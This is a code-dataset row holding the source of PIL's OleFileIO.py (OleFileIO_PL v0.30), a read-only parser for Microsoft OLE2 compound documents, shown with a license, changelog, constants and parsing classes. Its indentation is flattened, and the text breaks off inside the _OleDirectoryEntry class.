repo_name stringlengths 5 100 | path stringlengths 4 375 | copies stringclasses 991 values | size stringlengths 4 7 | content stringlengths 666 1M | license stringclasses 15 values |
|---|---|---|---|---|---|
havard024/prego | venv/lib/python2.7/site-packages/PIL/OleFileIO.py | 4 | 88896 | #!/usr/local/bin/python
# -*- coding: latin-1 -*-
"""
OleFileIO_PL:
Module to read Microsoft OLE2 files (also called Structured Storage or
Microsoft Compound Document File Format), such as Microsoft Office
documents, Image Composer and FlashPix files, Outlook messages, ...
This version is compatible with Python 2.6+ and 3.x
version 0.30 2014-02-04 Philippe Lagadec - http://www.decalage.info
Project website: http://www.decalage.info/python/olefileio
Improved version of the OleFileIO module from PIL library v1.1.6
See: http://www.pythonware.com/products/pil/index.htm
The Python Imaging Library (PIL) is
Copyright (c) 1997-2005 by Secret Labs AB
Copyright (c) 1995-2005 by Fredrik Lundh
OleFileIO_PL changes are Copyright (c) 2005-2014 by Philippe Lagadec
See source code and LICENSE.txt for information on usage and redistribution.
WARNING: THIS IS (STILL) WORK IN PROGRESS.
"""
# Starting with OleFileIO_PL v0.30, only Python 2.6+ and 3.x is supported
# This import enables print() as a function rather than a keyword
# (main requirement to be compatible with Python 3.x)
# The comment on the line below should be printed on Python 2.5 or older:
from __future__ import print_function # This version of OleFileIO_PL requires Python 2.6+ or 3.x.
__author__ = "Philippe Lagadec, Fredrik Lundh (Secret Labs AB)"
__date__ = "2014-02-04"
__version__ = '0.30'
#--- LICENSE ------------------------------------------------------------------
# OleFileIO_PL is an improved version of the OleFileIO module from the
# Python Imaging Library (PIL).
# OleFileIO_PL changes are Copyright (c) 2005-2014 by Philippe Lagadec
#
# The Python Imaging Library (PIL) is
# Copyright (c) 1997-2005 by Secret Labs AB
# Copyright (c) 1995-2005 by Fredrik Lundh
#
# By obtaining, using, and/or copying this software and/or its associated
# documentation, you agree that you have read, understood, and will comply with
# the following terms and conditions:
#
# Permission to use, copy, modify, and distribute this software and its
# associated documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appears in all copies, and that both
# that copyright notice and this permission notice appear in supporting
# documentation, and that the name of Secret Labs AB or the author(s) not be used
# in advertising or publicity pertaining to distribution of the software
# without specific, written prior permission.
#
# SECRET LABS AB AND THE AUTHORS DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS
# SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS.
# IN NO EVENT SHALL SECRET LABS AB OR THE AUTHORS BE LIABLE FOR ANY SPECIAL,
# INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR
# OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
# PERFORMANCE OF THIS SOFTWARE.
#-----------------------------------------------------------------------------
# CHANGELOG: (only OleFileIO_PL changes compared to PIL 1.1.6)
# 2005-05-11 v0.10 PL: - a few fixes for Python 2.4 compatibility
# (all changes flagged with [PL])
# 2006-02-22 v0.11 PL: - a few fixes for some Office 2003 documents which raise
# exceptions in _OleStream.__init__()
# 2006-06-09 v0.12 PL: - fixes for files above 6.8MB (DIFAT in loadfat)
# - added some constants
# - added header values checks
# - added some docstrings
# - getsect: bugfix in case sectors >512 bytes
# - getsect: added conformity checks
# - DEBUG_MODE constant to activate debug display
# 2007-09-04 v0.13 PL: - improved/translated (lots of) comments
# - updated license
# - converted tabs to 4 spaces
# 2007-11-19 v0.14 PL: - added OleFileIO._raise_defect() to adapt sensitivity
# - improved _unicode() to use Python 2.x unicode support
# - fixed bug in _OleDirectoryEntry
# 2007-11-25 v0.15 PL: - added safety checks to detect FAT loops
# - fixed _OleStream which didn't check stream size
# - added/improved many docstrings and comments
# - moved helper functions _unicode and _clsid out of
# OleFileIO class
# - improved OleFileIO._find() to add Unix path syntax
# - OleFileIO._find() is now case-insensitive
# - added get_type() and get_rootentry_name()
# - rewritten loaddirectory and _OleDirectoryEntry
# 2007-11-27 v0.16 PL: - added _OleDirectoryEntry.kids_dict
# - added detection of duplicate filenames in storages
# - added detection of duplicate references to streams
# - added get_size() and exists() to _OleDirectoryEntry
# - added isOleFile to check header before parsing
# - added __all__ list to control public keywords in pydoc
# 2007-12-04 v0.17 PL: - added _load_direntry to fix a bug in loaddirectory
# - improved _unicode(), added workarounds for Python <2.3
# - added set_debug_mode and -d option to set debug mode
# - fixed bugs in OleFileIO.open and _OleDirectoryEntry
# - added safety check in main for large or binary
# properties
# - allow size>0 for storages for some implementations
# 2007-12-05 v0.18 PL: - fixed several bugs in handling of FAT, MiniFAT and
# streams
# - added option '-c' in main to check all streams
# 2009-12-10 v0.19 PL: - bugfix for 32 bit arrays on 64 bits platforms
# (thanks to Ben G. and Martijn for reporting the bug)
# 2009-12-11 v0.20 PL: - bugfix in OleFileIO.open when filename is not plain str
# 2010-01-22 v0.21 PL: - added support for big-endian CPUs such as PowerPC Macs
# 2012-02-16 v0.22 PL: - fixed bug in getproperties, patch by chuckleberryfinn
# (https://bitbucket.org/decalage/olefileio_pl/issue/7)
# - added close method to OleFileIO (fixed issue #2)
# 2012-07-25 v0.23 PL: - added support for file-like objects (patch by mete0r_kr)
# 2013-05-05 v0.24 PL: - getproperties: added conversion from filetime to python
# datetime
# - main: displays properties with date format
# - new class OleMetadata to parse standard properties
# - added get_metadata method
# 2013-05-07 v0.24 PL: - a few improvements in OleMetadata
# 2013-05-24 v0.25 PL: - getproperties: option to not convert some timestamps
# - OleMetaData: total_edit_time is now a number of seconds,
# not a timestamp
# - getproperties: added support for VT_BOOL, VT_INT, V_UINT
# - getproperties: filter out null chars from strings
# - getproperties: raise non-fatal defects instead of
# exceptions when properties cannot be parsed properly
# 2013-05-27 PL: - getproperties: improved exception handling
# - _raise_defect: added option to set exception type
# - all non-fatal issues are now recorded, and displayed
# when run as a script
# 2013-07-11 v0.26 PL: - added methods to get modification and creation times
# of a directory entry or a storage/stream
# - fixed parsing of direntry timestamps
# 2013-07-24 PL: - new options in listdir to list storages and/or streams
# 2014-02-04 v0.30 PL: - upgraded code to support Python 3.x by Martin Panter
# - several fixes for Python 2.6 (xrange, MAGIC)
# - reused i32 from Pillow's _binary
#-----------------------------------------------------------------------------
# TODO (for version 1.0):
# + isOleFile should accept file-like objects like open
# + fix how all the methods handle unicode str and/or bytes as arguments
# + add path attrib to _OleDirEntry, set it once and for all in init or
# append_kids (then listdir/_list can be simplified)
# - TESTS with Linux, MacOSX, Python 1.5.2, various files, PIL, ...
# - add underscore to each private method, to avoid their display in
# pydoc/epydoc documentation - Remove it for classes to be documented
# - replace all raised exceptions with _raise_defect (at least in OleFileIO)
# - merge code from _OleStream and OleFileIO.getsect to read sectors
# (maybe add a class for FAT and MiniFAT ?)
# - add method to check all streams (follow sectors chains without storing all
# stream in memory, and report anomalies)
# - use _OleDirectoryEntry.kids_dict to improve _find and _list ?
# - fix Unicode names handling (find some way to stay compatible with Py1.5.2)
# => if possible avoid converting names to Latin-1
# - review DIFAT code: fix handling of DIFSECT blocks in FAT (not stop)
# - rewrite OleFileIO.getproperties
# - improve docstrings to show more sample uses
# - see also original notes and FIXME below
# - remove all obsolete FIXMEs
# - OleMetadata: fix version attrib according to
# http://msdn.microsoft.com/en-us/library/dd945671%28v=office.12%29.aspx
# IDEAS:
# - in OleFileIO._open and _OleStream, use size=None instead of 0x7FFFFFFF for
# streams with unknown size
# - use arrays of int instead of long integers for FAT/MiniFAT, to improve
# performance and reduce memory usage ? (possible issue with values >2^31)
# - provide tests with unittest (may need write support to create samples)
# - move all debug code (and maybe dump methods) to a separate module, with
# a class which inherits OleFileIO ?
# - fix docstrings to follow epydoc format
# - add support for 4K sectors ?
# - add support for big endian byte order ?
# - create a simple OLE explorer with wxPython
# FUTURE EVOLUTIONS to add write support:
# 1) add ability to write a stream back on disk from BytesIO (same size, no
# change in FAT/MiniFAT).
# 2) rename a stream/storage if it doesn't change the RB tree
# 3) use rbtree module to update the red-black tree + any rename
# 4) remove a stream/storage: free sectors in FAT/MiniFAT
# 5) allocate new sectors in FAT/MiniFAT
# 6) create new storage/stream
#-----------------------------------------------------------------------------
#
# THIS IS WORK IN PROGRESS
#
# The Python Imaging Library
# $Id$
#
# stuff to deal with OLE2 Structured Storage files. this module is
# used by PIL to read Image Composer and FlashPix files, but can also
# be used to read other files of this type.
#
# History:
# 1997-01-20 fl Created
# 1997-01-22 fl Fixed 64-bit portability quirk
# 2003-09-09 fl Fixed typo in OleFileIO.loadfat (noted by Daniel Haertle)
# 2004-02-29 fl Changed long hex constants to signed integers
#
# Notes:
# FIXME: sort out sign problem (eliminate long hex constants)
# FIXME: change filename to use "a/b/c" instead of ["a", "b", "c"]
# FIXME: provide a glob mechanism function (using fnmatchcase)
#
# Literature:
#
# "FlashPix Format Specification, Appendix A", Kodak and Microsoft,
# September 1996.
#
# Quotes:
#
# "If this document and functionality of the Software conflict,
# the actual functionality of the Software represents the correct
# functionality" -- Microsoft, in the OLE format specification
#
# Copyright (c) Secret Labs AB 1997.
# Copyright (c) Fredrik Lundh 1997.
#
# See the README file for information on usage and redistribution.
#
#------------------------------------------------------------------------------
import io
import sys
import struct, array, os.path, datetime
#[PL] Define explicitly the public API to avoid private objects in pydoc:
__all__ = ['OleFileIO', 'isOleFile', 'MAGIC']
# For Python 3.x, need to redefine long as int:
if str is not bytes:
long = int
# Need to make sure we use xrange both on Python 2 and 3.x:
try:
# on Python 2 we need xrange:
iterrange = xrange
except:
# no xrange, for Python 3 it was renamed as range:
iterrange = range
#[PL] workaround to fix an issue with array item size on 64 bits systems:
if array.array('L').itemsize == 4:
# on 32 bits platforms, long integers in an array are 32 bits:
UINT32 = 'L'
elif array.array('I').itemsize == 4:
# on 64 bits platforms, integers in an array are 32 bits:
UINT32 = 'I'
else:
raise ValueError('Need to fix a bug with 32 bit arrays, please contact author...')
#[PL] These workarounds were inspired from the Path module
# (see http://www.jorendorff.com/articles/python/path/)
#TODO: test with old Python versions
# Pre-2.3 workaround for basestring.
try:
basestring
except NameError:
try:
# is Unicode supported (Python >2.0 or >1.6 ?)
basestring = (str, unicode)
except NameError:
basestring = str
#[PL] Experimental setting: if True, OLE filenames will be kept in Unicode
# if False (default PIL behaviour), all filenames are converted to Latin-1.
KEEP_UNICODE_NAMES = False
#[PL] DEBUG display mode: False by default, use set_debug_mode() or "-d" on
# command line to change it.
DEBUG_MODE = False
def debug_print(msg):
print(msg)
def debug_pass(msg):
pass
debug = debug_pass
def set_debug_mode(debug_mode):
"""
Set debug mode on or off, to control display of debugging messages.
mode: True or False
"""
global DEBUG_MODE, debug
DEBUG_MODE = debug_mode
if debug_mode:
debug = debug_print
else:
debug = debug_pass
MAGIC = b'\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1'
#[PL]: added constants for Sector IDs (from AAF specifications)
MAXREGSECT = 0xFFFFFFFA; # maximum SECT
DIFSECT = 0xFFFFFFFC; # (-4) denotes a DIFAT sector in a FAT
FATSECT = 0xFFFFFFFD; # (-3) denotes a FAT sector in a FAT
ENDOFCHAIN = 0xFFFFFFFE; # (-2) end of a virtual stream chain
FREESECT = 0xFFFFFFFF; # (-1) unallocated sector
#[PL]: added constants for Directory Entry IDs (from AAF specifications)
MAXREGSID = 0xFFFFFFFA; # maximum directory entry ID
NOSTREAM = 0xFFFFFFFF; # (-1) unallocated directory entry
#[PL] object types in storage (from AAF specifications)
STGTY_EMPTY = 0 # empty directory entry (according to OpenOffice.org doc)
STGTY_STORAGE = 1 # element is a storage object
STGTY_STREAM = 2 # element is a stream object
STGTY_LOCKBYTES = 3 # element is an ILockBytes object
STGTY_PROPERTY = 4 # element is an IPropertyStorage object
STGTY_ROOT = 5 # element is a root storage
#
# --------------------------------------------------------------------
# property types
VT_EMPTY=0; VT_NULL=1; VT_I2=2; VT_I4=3; VT_R4=4; VT_R8=5; VT_CY=6;
VT_DATE=7; VT_BSTR=8; VT_DISPATCH=9; VT_ERROR=10; VT_BOOL=11;
VT_VARIANT=12; VT_UNKNOWN=13; VT_DECIMAL=14; VT_I1=16; VT_UI1=17;
VT_UI2=18; VT_UI4=19; VT_I8=20; VT_UI8=21; VT_INT=22; VT_UINT=23;
VT_VOID=24; VT_HRESULT=25; VT_PTR=26; VT_SAFEARRAY=27; VT_CARRAY=28;
VT_USERDEFINED=29; VT_LPSTR=30; VT_LPWSTR=31; VT_FILETIME=64;
VT_BLOB=65; VT_STREAM=66; VT_STORAGE=67; VT_STREAMED_OBJECT=68;
VT_STORED_OBJECT=69; VT_BLOB_OBJECT=70; VT_CF=71; VT_CLSID=72;
VT_VECTOR=0x1000;
# map property id to name (for debugging purposes)
VT = {}
for keyword, var in list(vars().items()):
if keyword[:3] == "VT_":
VT[var] = keyword
#
# --------------------------------------------------------------------
# Some common document types (root.clsid fields)
WORD_CLSID = "00020900-0000-0000-C000-000000000046"
#TODO: check Excel, PPT, ...
#[PL]: Defect levels to classify parsing errors - see OleFileIO._raise_defect()
DEFECT_UNSURE = 10 # a case which looks weird, but not sure it's a defect
DEFECT_POTENTIAL = 20 # a potential defect
DEFECT_INCORRECT = 30 # an error according to specifications, but parsing
# can go on
DEFECT_FATAL = 40 # an error which cannot be ignored, parsing is
# impossible
#[PL] add useful constants to __all__:
for key in list(vars().keys()):
if key.startswith('STGTY_') or key.startswith('DEFECT_'):
__all__.append(key)
#--- FUNCTIONS ----------------------------------------------------------------
def isOleFile (filename):
"""
Test if file is an OLE container (according to its header).
filename: file name or path (str, unicode)
return: True if OLE, False otherwise.
"""
f = open(filename, 'rb')
header = f.read(len(MAGIC))
if header == MAGIC:
return True
else:
return False
if bytes is str:
# version for Python 2.x
def i8(c):
return ord(c)
else:
# version for Python 3.x
def i8(c):
return c if c.__class__ is int else c[0]
#TODO: replace i16 and i32 with more readable struct.unpack equivalent?
def i16(c, o = 0):
"""
Converts a 2-bytes (16 bits) string to an integer.
c: string containing bytes to convert
o: offset of bytes to convert in string
"""
return i8(c[o]) | (i8(c[o+1])<<8)
def i32(c, o = 0):
"""
Converts a 4-bytes (32 bits) string to an integer.
c: string containing bytes to convert
o: offset of bytes to convert in string
"""
## return int(ord(c[o])+(ord(c[o+1])<<8)+(ord(c[o+2])<<16)+(ord(c[o+3])<<24))
## # [PL]: added int() because "<<" gives long int since Python 2.4
# copied from Pillow's _binary:
return i8(c[o]) | (i8(c[o+1])<<8) | (i8(c[o+2])<<16) | (i8(c[o+3])<<24)
def _clsid(clsid):
"""
Converts a CLSID to a human-readable string.
clsid: string of length 16.
"""
assert len(clsid) == 16
# if clsid is only made of null bytes, return an empty string:
# (PL: why not simply return the string with zeroes?)
if not clsid.strip(b"\0"):
return ""
return (("%08X-%04X-%04X-%02X%02X-" + "%02X" * 6) %
((i32(clsid, 0), i16(clsid, 4), i16(clsid, 6)) +
tuple(map(i8, clsid[8:16]))))
# UNICODE support:
# (necessary to handle storages/streams names which use Unicode)
def _unicode(s, errors='replace'):
"""
Map unicode string to Latin 1. (Python with Unicode support)
s: UTF-16LE unicode string to convert to Latin-1
errors: 'replace', 'ignore' or 'strict'.
"""
#TODO: test if it OleFileIO works with Unicode strings, instead of
# converting to Latin-1.
try:
# First the string is converted to plain Unicode:
# (assuming it is encoded as UTF-16 little-endian)
u = s.decode('UTF-16LE', errors)
if bytes is not str or KEEP_UNICODE_NAMES:
return u
else:
# Second the unicode string is converted to Latin-1
return u.encode('latin_1', errors)
except:
# there was an error during Unicode to Latin-1 conversion:
raise IOError('incorrect Unicode name')
def filetime2datetime(filetime):
"""
convert FILETIME (64 bits int) to Python datetime.datetime
"""
# TODO: manage exception when microseconds is too large
# inspired from http://code.activestate.com/recipes/511425-filetime-to-datetime/
_FILETIME_null_date = datetime.datetime(1601, 1, 1, 0, 0, 0)
#debug('timedelta days=%d' % (filetime//(10*1000000*3600*24)))
return _FILETIME_null_date + datetime.timedelta(microseconds=filetime//10)
#=== CLASSES ==================================================================
class OleMetadata:
"""
class to parse and store metadata from standard properties of OLE files.
Available attributes:
codepage, title, subject, author, keywords, comments, template,
last_saved_by, revision_number, total_edit_time, last_printed, create_time,
last_saved_time, num_pages, num_words, num_chars, thumbnail,
creating_application, security, codepage_doc, category, presentation_target,
bytes, lines, paragraphs, slides, notes, hidden_slides, mm_clips,
scale_crop, heading_pairs, titles_of_parts, manager, company, links_dirty,
chars_with_spaces, unused, shared_doc, link_base, hlinks, hlinks_changed,
version, dig_sig, content_type, content_status, language, doc_version
Note: an attribute is set to None when not present in the properties of the
OLE file.
References for SummaryInformation stream:
- http://msdn.microsoft.com/en-us/library/dd942545.aspx
- http://msdn.microsoft.com/en-us/library/dd925819%28v=office.12%29.aspx
- http://msdn.microsoft.com/en-us/library/windows/desktop/aa380376%28v=vs.85%29.aspx
- http://msdn.microsoft.com/en-us/library/aa372045.aspx
- http://sedna-soft.de/summary-information-stream/
- http://poi.apache.org/apidocs/org/apache/poi/hpsf/SummaryInformation.html
References for DocumentSummaryInformation stream:
- http://msdn.microsoft.com/en-us/library/dd945671%28v=office.12%29.aspx
- http://msdn.microsoft.com/en-us/library/windows/desktop/aa380374%28v=vs.85%29.aspx
- http://poi.apache.org/apidocs/org/apache/poi/hpsf/DocumentSummaryInformation.html
new in version 0.25
"""
# attribute names for SummaryInformation stream properties:
# (ordered by property id, starting at 1)
SUMMARY_ATTRIBS = ['codepage', 'title', 'subject', 'author', 'keywords', 'comments',
'template', 'last_saved_by', 'revision_number', 'total_edit_time',
'last_printed', 'create_time', 'last_saved_time', 'num_pages',
'num_words', 'num_chars', 'thumbnail', 'creating_application',
'security']
# attribute names for DocumentSummaryInformation stream properties:
# (ordered by property id, starting at 1)
DOCSUM_ATTRIBS = ['codepage_doc', 'category', 'presentation_target', 'bytes', 'lines', 'paragraphs',
'slides', 'notes', 'hidden_slides', 'mm_clips',
'scale_crop', 'heading_pairs', 'titles_of_parts', 'manager',
'company', 'links_dirty', 'chars_with_spaces', 'unused', 'shared_doc',
'link_base', 'hlinks', 'hlinks_changed', 'version', 'dig_sig',
'content_type', 'content_status', 'language', 'doc_version']
def __init__(self):
"""
Constructor for OleMetadata
All attributes are set to None by default
"""
# properties from SummaryInformation stream
self.codepage = None
self.title = None
self.subject = None
self.author = None
self.keywords = None
self.comments = None
self.template = None
self.last_saved_by = None
self.revision_number = None
self.total_edit_time = None
self.last_printed = None
self.create_time = None
self.last_saved_time = None
self.num_pages = None
self.num_words = None
self.num_chars = None
self.thumbnail = None
self.creating_application = None
self.security = None
# properties from DocumentSummaryInformation stream
self.codepage_doc = None
self.category = None
self.presentation_target = None
self.bytes = None
self.lines = None
self.paragraphs = None
self.slides = None
self.notes = None
self.hidden_slides = None
self.mm_clips = None
self.scale_crop = None
self.heading_pairs = None
self.titles_of_parts = None
self.manager = None
self.company = None
self.links_dirty = None
self.chars_with_spaces = None
self.unused = None
self.shared_doc = None
self.link_base = None
self.hlinks = None
self.hlinks_changed = None
self.version = None
self.dig_sig = None
self.content_type = None
self.content_status = None
self.language = None
self.doc_version = None
def parse_properties(self, olefile):
"""
Parse standard properties of an OLE file, from the streams
"\x05SummaryInformation" and "\x05DocumentSummaryInformation",
if present.
Properties are converted to strings, integers or python datetime objects.
If a property is not present, its value is set to None.
"""
# first set all attributes to None:
for attrib in (self.SUMMARY_ATTRIBS + self.DOCSUM_ATTRIBS):
setattr(self, attrib, None)
if olefile.exists("\x05SummaryInformation"):
# get properties from the stream:
# (converting timestamps to python datetime, except total_edit_time,
# which is property #10)
props = olefile.getproperties("\x05SummaryInformation",
convert_time=True, no_conversion=[10])
# store them into this object's attributes:
for i in range(len(self.SUMMARY_ATTRIBS)):
# ids for standards properties start at 0x01, until 0x13
value = props.get(i+1, None)
setattr(self, self.SUMMARY_ATTRIBS[i], value)
if olefile.exists("\x05DocumentSummaryInformation"):
# get properties from the stream:
props = olefile.getproperties("\x05DocumentSummaryInformation",
convert_time=True)
# store them into this object's attributes:
for i in range(len(self.DOCSUM_ATTRIBS)):
# ids for standards properties start at 0x01, until 0x13
value = props.get(i+1, None)
setattr(self, self.DOCSUM_ATTRIBS[i], value)
def dump(self):
"""
Dump all metadata, for debugging purposes.
"""
print('Properties from SummaryInformation stream:')
for prop in self.SUMMARY_ATTRIBS:
value = getattr(self, prop)
print('- %s: %s' % (prop, repr(value)))
print('Properties from DocumentSummaryInformation stream:')
for prop in self.DOCSUM_ATTRIBS:
value = getattr(self, prop)
print('- %s: %s' % (prop, repr(value)))
#--- _OleStream ---------------------------------------------------------------
class _OleStream(io.BytesIO):
"""
OLE2 Stream
Returns a read-only file object which can be used to read
the contents of a OLE stream (instance of the BytesIO class).
To open a stream, use the openstream method in the OleFile class.
This function can be used with either ordinary streams,
or ministreams, depending on the offset, sectorsize, and
fat table arguments.
Attributes:
- size: actual size of data stream, after it was opened.
"""
# FIXME: should store the list of sects obtained by following
# the fat chain, and load new sectors on demand instead of
# loading it all in one go.
def __init__(self, fp, sect, size, offset, sectorsize, fat, filesize):
"""
Constructor for _OleStream class.
fp : file object, the OLE container or the MiniFAT stream
sect : sector index of first sector in the stream
size : total size of the stream
offset : offset in bytes for the first FAT or MiniFAT sector
sectorsize: size of one sector
fat : array/list of sector indexes (FAT or MiniFAT)
filesize : size of OLE file (for debugging)
return : a BytesIO instance containing the OLE stream
"""
debug('_OleStream.__init__:')
debug(' sect=%d (%X), size=%d, offset=%d, sectorsize=%d, len(fat)=%d, fp=%s'
%(sect,sect,size,offset,sectorsize,len(fat), repr(fp)))
#[PL] To detect malformed documents with FAT loops, we compute the
# expected number of sectors in the stream:
unknown_size = False
if size==0x7FFFFFFF:
# this is the case when called from OleFileIO._open(), and stream
# size is not known in advance (for example when reading the
# Directory stream). Then we can only guess maximum size:
size = len(fat)*sectorsize
# and we keep a record that size was unknown:
unknown_size = True
debug(' stream with UNKNOWN SIZE')
nb_sectors = (size + (sectorsize-1)) // sectorsize
debug('nb_sectors = %d' % nb_sectors)
# This number should (at least) be less than the total number of
# sectors in the given FAT:
if nb_sectors > len(fat):
raise IOError('malformed OLE document, stream too large')
# optimization(?): data is first a list of strings, and join() is called
# at the end to concatenate all in one string.
# (this may not be really useful with recent Python versions)
data = []
# if size is zero, then first sector index should be ENDOFCHAIN:
if size == 0 and sect != ENDOFCHAIN:
debug('size == 0 and sect != ENDOFCHAIN:')
raise IOError('incorrect OLE sector index for empty stream')
#[PL] A fixed-length for loop is used instead of an undefined while
# loop to avoid DoS attacks:
for i in range(nb_sectors):
# Sector index may be ENDOFCHAIN, but only if size was unknown
if sect == ENDOFCHAIN:
if unknown_size:
break
else:
# else this means that the stream is smaller than declared:
debug('sect=ENDOFCHAIN before expected size')
raise IOError('incomplete OLE stream')
# sector index should be within FAT:
if sect<0 or sect>=len(fat):
debug('sect=%d (%X) / len(fat)=%d' % (sect, sect, len(fat)))
debug('i=%d / nb_sectors=%d' %(i, nb_sectors))
## tmp_data = b"".join(data)
## f = open('test_debug.bin', 'wb')
## f.write(tmp_data)
## f.close()
## debug('data read so far: %d bytes' % len(tmp_data))
raise IOError('incorrect OLE FAT, sector index out of range')
#TODO: merge this code with OleFileIO.getsect() ?
#TODO: check if this works with 4K sectors:
try:
fp.seek(offset + sectorsize * sect)
except:
debug('sect=%d, seek=%d, filesize=%d' %
(sect, offset+sectorsize*sect, filesize))
raise IOError('OLE sector index out of range')
sector_data = fp.read(sectorsize)
# [PL] check if there was enough data:
# Note: if sector is the last of the file, sometimes it is not a
# complete sector (of 512 or 4K), so we may read less than
# sectorsize.
if len(sector_data)!=sectorsize and sect!=(len(fat)-1):
debug('sect=%d / len(fat)=%d, seek=%d / filesize=%d, len read=%d' %
(sect, len(fat), offset+sectorsize*sect, filesize, len(sector_data)))
debug('seek+len(read)=%d' % (offset+sectorsize*sect+len(sector_data)))
raise IOError('incomplete OLE sector')
data.append(sector_data)
# jump to next sector in the FAT:
try:
sect = fat[sect]
except IndexError:
# [PL] if pointer is out of the FAT an exception is raised
raise IOError('incorrect OLE FAT, sector index out of range')
#[PL] Last sector should be a "end of chain" marker:
if sect != ENDOFCHAIN:
raise IOError('incorrect last sector index in OLE stream')
data = b"".join(data)
# Data is truncated to the actual stream size:
if len(data) >= size:
data = data[:size]
# actual stream size is stored for future use:
self.size = size
elif unknown_size:
# actual stream size was not known, now we know the size of read
# data:
self.size = len(data)
else:
# read data is less than expected:
debug('len(data)=%d, size=%d' % (len(data), size))
raise IOError('OLE stream size is less than declared')
# when all data is read in memory, BytesIO constructor is called
io.BytesIO.__init__(self, data)
# Then the _OleStream object can be used as a read-only file object.
#--- _OleDirectoryEntry -------------------------------------------------------
class _OleDirectoryEntry:
"""
OLE2 Directory Entry
"""
#[PL] parsing code moved from OleFileIO.loaddirectory
# struct to parse directory entries:
# <: little-endian byte order, standard sizes
# (note: this should guarantee that Q returns a 64 bits int)
# 64s: string containing entry name in unicode (max 31 chars) + null char
# H: uint16, number of bytes used in name buffer, including null = (len+1)*2
# B: uint8, dir entry type (between 0 and 5)
# B: uint8, color: 0=black, 1=red
# I: uint32, index of left child node in the red-black tree, NOSTREAM if none
# I: uint32, index of right child node in the red-black tree, NOSTREAM if none
# I: uint32, index of child root node if it is a storage, else NOSTREAM
# 16s: CLSID, unique identifier (only used if it is a storage)
# I: uint32, user flags
# Q (was 8s): uint64, creation timestamp or zero
# Q (was 8s): uint64, modification timestamp or zero
# I: uint32, SID of first sector if stream or ministream, SID of 1st sector
# of stream containing ministreams if root entry, 0 otherwise
# I: uint32, total stream size in bytes if stream (low 32 bits), 0 otherwise
# I: uint32, total stream size in bytes if stream (high 32 bits), 0 otherwise
STRUCT_DIRENTRY = '<64sHBBIII16sIQQIII'
# size of a directory entry: 128 bytes
DIRENTRY_SIZE = 128
assert struct.calcsize(STRUCT_DIRENTRY) == DIRENTRY_SIZE
def __init__(self, entry, sid, olefile):
"""
Constructor for an _OleDirectoryEntry object.
Parses a 128-bytes entry from the OLE Directory stream.
entry : string (must be 128 bytes long)
sid : index of this directory entry in the OLE file directory
olefile: OleFileIO containing this directory entry
"""
self.sid = sid
# ref to olefile is stored for future use
self.olefile = olefile
# kids is a list of children entries, if this entry is a storage:
# (list of _OleDirectoryEntry objects)
self.kids = []
# kids_dict is a dictionary of children entries, indexed by their
# name in lowercase: used to quickly find an entry, and to detect
# duplicates
self.kids_dict = {}
# flag used to detect if the entry is referenced more than once in
# directory:
self.used = False
# decode DirEntry
(
name,
namelength,
self.entry_type,
self.color,
self.sid_left,
self.sid_right,
self.sid_child,
clsid,
self.dwUserFlags,
self.createTime,
self.modifyTime,
self.isectStart,
sizeLow,
sizeHigh
) = struct.unpack(_OleDirectoryEntry.STRUCT_DIRENTRY, entry)
if self.entry_type not in [STGTY_ROOT, STGTY_STORAGE, STGTY_STREAM, STGTY_EMPTY]:
olefile._raise_defect(DEFECT_INCORRECT, 'unhandled OLE storage type')
# only first directory entry can (and should) be root:
if self.entry_type == STGTY_ROOT and sid != 0:
olefile._raise_defect(DEFECT_INCORRECT, 'duplicate OLE root entry')
if sid == 0 and self.entry_type != STGTY_ROOT:
olefile._raise_defect(DEFECT_INCORRECT, 'incorrect OLE root entry')
#debug (struct.unpack(fmt_entry, entry[:len_entry]))
# name should be at most 31 unicode characters + null character,
# so 64 bytes in total (31*2 + 2):
if namelength>64:
olefile._raise_defect(DEFECT_INCORRECT, 'incorrect DirEntry name length')
# if exception not raised, namelength is set to the maximum value:
namelength = 64
# only characters without ending null char are kept:
name = name[:(namelength-2)]
# name is converted from unicode to Latin-1:
self.name = _unicode(name)
debug('DirEntry SID=%d: %s' % (self.sid, repr(self.name)))
debug(' - type: %d' % self.entry_type)
debug(' - sect: %d' % self.isectStart)
debug(' - SID left: %d, right: %d, child: %d' % (self.sid_left,
self.sid_right, self.sid_child))
# sizeHigh is only used for 4K sectors, it should be zero for 512 bytes
# sectors, BUT apparently some implementations set it as 0xFFFFFFFF, 1
# or some other value so it cannot be raised as a defect in general:
if olefile.sectorsize == 512:
if sizeHigh != 0 and sizeHigh != 0xFFFFFFFF:
debug('sectorsize=%d, sizeLow=%d, sizeHigh=%d (%X)' %
(olefile.sectorsize, sizeLow, sizeHigh, sizeHigh))
olefile._raise_defect(DEFECT_UNSURE, 'incorrect OLE stream size')
self.size = sizeLow
else:
self.size = sizeLow + (long(sizeHigh)<<32)
debug(' - size: %d (sizeLow=%d, sizeHigh=%d)' % (self.size, sizeLow, sizeHigh))
self.clsid = _clsid(clsid)
# a storage should have a null size, BUT some implementations such as
# Word 8 for Mac seem to allow non-null values => Potential defect:
if self.entry_type == STGTY_STORAGE and self.size != 0:
olefile._raise_defect(DEFECT_POTENTIAL, 'OLE storage with size>0')
# check if stream is not already referenced elsewhere:
if self.entry_type in (STGTY_ROOT, STGTY_STREAM) and self.size>0:
if self.size < olefile.minisectorcutoff \
and self.entry_type==STGTY_STREAM: # only streams can be in MiniFAT
# ministream object
minifat = True
else:
minifat = False
olefile._check_duplicate_stream(self.isectStart, minifat)
def build_storage_tree(self):
"""
Read and build the red-black tree attached to this _OleDirectoryEntry
object, if it is a storage.
Note that this method builds a tree of all subentries, so it should
only be called for the root object once.
"""
debug('build_storage_tree: SID=%d - %s - sid_child=%d'
% (self.sid, repr(self.name), self.sid_child))
if self.sid_child != NOSTREAM:
# if child SID is not NOSTREAM, then this entry is a storage.
# Let's walk through the tree of children to fill the kids list:
self.append_kids(self.sid_child)
# Note from OpenOffice documentation: the safest way is to
# recreate the tree because some implementations may store broken
# red-black trees...
# in the OLE file, entries are sorted on (length, name).
# for convenience, we sort them on name instead:
# (see rich comparison methods in this class)
self.kids.sort()
def append_kids(self, child_sid):
"""
